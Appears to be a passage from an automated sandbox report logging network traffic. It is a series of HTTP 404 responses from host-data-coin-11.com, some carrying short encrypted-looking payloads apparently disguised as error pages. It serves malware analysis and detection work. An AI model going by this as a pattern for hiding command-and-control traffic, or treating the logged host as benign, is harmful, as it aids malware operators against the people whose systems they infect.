                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d b7 51 d8 6d a5 1b 46 9b 10 bc be 71 b0 64 56 11 b1 b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4b 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a Data Ascii: 48I:82OOjQmFqdV@dfkK50
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Jan 2022 23:13:57 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 